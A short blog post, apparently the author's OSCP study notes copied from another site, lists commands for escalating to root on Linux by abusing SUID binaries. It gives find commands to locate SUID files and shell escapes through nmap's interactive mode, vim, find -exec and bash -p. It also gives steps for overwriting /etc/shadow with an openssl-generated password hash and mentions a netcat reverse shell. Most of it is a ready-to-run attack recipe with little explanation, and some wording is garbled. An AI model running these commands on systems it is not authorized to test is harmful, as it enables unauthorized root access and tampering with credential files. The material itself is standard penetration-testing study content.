Furrukh Taj

Infosec Enthusiast

Exploiting SUIDS for Privilege Escalation

08 Nov 2018 » hacking, security, privilege-escalation, oscp

Original Post: Pentest Lab

-- Another copy/paste for my own reference I used for OSCP.
-- Known Linux executables that can allow privilege escalation are:

  • nmap
  • vim
  • find
  • bash
  • more
  • less
  • nano
  • cp

– Find the files that can be exploited to gain root access:

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
find / -perm -4000 -exec ls -l {} \;

nmap <= 5.21

nmap -V
nmap --interactive
nmap> !sh
sh-3.2# whoami



Press ESC key

:set shell=/bin/sh


touch me
find me -exec whoami \;

-- Now, to gain root access, we can get a reverse shell using NC or update the /etc/shadow file with a password using sslopen

 openssl passwd -1 -salt xyz  yourpass
 makepasswd --clearfrom=- --crypt-md5 <<< YourPass

-- Use the above output, append that to root and update shadow file.


bash -p
bash-3.2# id

more & less

less /etc/passwd

-- Use nano to edit the /etc/shadow file

-- Copy shadow file, add password to it and then copy the new one back to /etc/shadow

cp /etc/shadow /tmp/shadow
openssl passwd -1 -salt xyz  yourpass
vi /tmp/shadow
cp /tmp/shadow /etc/shadow
su root